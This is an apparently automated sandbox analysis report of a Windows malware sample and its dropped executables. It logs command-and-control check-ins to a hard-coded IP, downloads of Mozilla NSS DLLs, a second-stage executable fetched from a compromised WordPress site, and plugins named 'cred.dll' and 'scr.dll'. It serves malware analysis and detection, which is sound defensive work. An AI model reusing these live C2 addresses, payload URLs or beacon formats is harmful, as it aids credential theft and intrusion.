                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: global trafficHTTP traffic detected: POST /Hnq8vS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.111.174.114Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0
                              Source: Joe Sandbox ViewIP Address: 104.17.63.50 104.17.63.50
                              Source: Joe Sandbox ViewIP Address: 78.47.81.226 78.47.81.226
                              Source: Joe Sandbox ViewASN Name: MIROHOSTWebhostingdatacenteranddomainnamesregistrati MIROHOSTWebhostingdatacenteranddomainnamesregistrati
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.6
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: unknownTCP traffic detected without corresponding DNS query: 78.47.81.226
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_004044CB __EH_prolog3_GS,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004044CB
                              Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.47.81.226Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /wp-content/themes/cinestar/extendvc/xsrv2.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: ukedocumentary.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Hnq8vS/plugins/cred.dll HTTP/1.1Host: 176.111.174.114
                              Source: global trafficHTTP traffic detected: GET /Hnq8vS/plugins/scr.dll HTTP/1.1Host: 176.111.174.114
                              Source: unknownDNS traffic detected: queries for: api.faceit.com
                              Source: unknownHTTP traffic detected: POST /873 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 78.47.81.226Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmp, blfte.exe, 0000000A.00000002.923945938.00000000006B5000.00000004.00000001.sdmp, blfte.exe, 0000000A.00000002.926601724.0000000003670000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php)
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php.FileTypeAssociationR
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php14/Hnq8vS/index.php
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php14/Hnq8vS/index.phpK
                              Source: blfte.exe, 0000000A.00000002.926933202.00000000036A9000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php1D
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php2
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php9c61
                              Source: blfte.exe, 0000000A.00000002.926601724.0000000003670000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.php?t
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.phpC
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.phpo
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.phpr
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/index.phpv
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/plugins/cred.dll
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/plugins/cred.dllQ.b
                              Source: blfte.exe, 0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.114/Hnq8vS/plugins/scr.dll
                              Source: blfte.exe, 0000000A.00000002.926601724.0000000003670000.00000004.00000001.sdmpString found in binary or memory: http://176.111.174.11414/Hnq8vS/index.php
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/873
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/8734
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/E
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/freebl3.dll
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/mozglue.dll
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/mozglue.dll:R
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/msvcp140.dll
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/nss3.dll
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/softokn3.dll
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/softokn3.dll4v=
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/vcruntime140.dllTB
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700301499.0000000000893000.00000004.00000001.sdmpString found in binary or memory: http://78.47.81.226/vcruntime140.dlliB
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.geotrust.com/GeoTrustRSACA2018.crt0
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://cdp.geotrust.com/GeoTrustRSACA2018.crl0L
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ocsp.thawte.com0
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmpString found in binary or memory: http://status.geotrust.com0=
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmp, wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700929303.0000000002C9D000.00000004.00000001.sdmpString found in binary or memory: http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe;
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700929303.0000000002C9D000.00000004.00000001.sdmpString found in binary or memory: http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe;slDB
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700929303.0000000002C9D000.00000004.00000001.sdmpString found in binary or memory: http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exeeDB
                              Source: mozglue[1].dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                              Source: softokn3[1].dll.0.drString found in binary or memory: http://www.mozilla.com0
                              Source: blfte.exe, 0000000A.00000002.923945938.00000000006B5000.00000004.00000001.sdmpString found in binary or memory: https:///Hnq8vS/index.php
                              Source: temp.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: https://api.faceit.com/Gu
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: https://api.faceit.com/Nu
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: https://api.faceit.com/core/v1/nicknames/sslamlssa
                              Source: temp.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: temp.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: temp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: temp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
                              Source: temp.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700284995.0000000000879000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                              Source: temp.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                              Source: temp.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700263265.000000000085B000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemet
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700317916.00000000008AE000.00000004.00000001.sdmp, softokn3[1].dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.701191572.0000000003048000.00000004.00000001.sdmp, temp.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                              Source: unknownHTTPS traffic detected: 104.17.63.50:443 -> 192.168.2.4:49733 version: TLS 1.2
                              Source: wKYTg7Gp6P.exe, 00000000.00000002.700205430.00000000007EA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_00462AE70_2_00462AE7
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_004511910_2_00451191
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0043F2310_2_0043F231
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_004620850_2_00462085
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_004261090_2_00426109
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0047627D0_2_0047627D
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0047A54F0_2_0047A54F
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0045652F0_2_0045652F
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_004030405_2_00403040
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0041E0C05_2_0041E0C0
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_00412A075_2_00412A07
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_004213F75_2_004213F7
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0041E5585_2_0041E558
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_004215175_2_00421517
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0042276D5_2_0042276D
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_004237205_2_00423720
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_021032905_2_02103290
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_0211E3105_2_0211E310
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_021239705_2_02123970
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_021229BD5_2_021229BD
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_021216475_2_02121647
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_021217675_2_02121767
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeCode function: 5_2_02112C575_2_02112C57
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0040304010_2_00403040
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0041E0C010_2_0041E0C0
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_00412A0710_2_00412A07
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_004213F710_2_004213F7
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0041E55810_2_0041E558
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0042151710_2_00421517
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0042276D10_2_0042276D
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0042372010_2_00423720
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeCode function: 10_2_0222329010_2_02223290
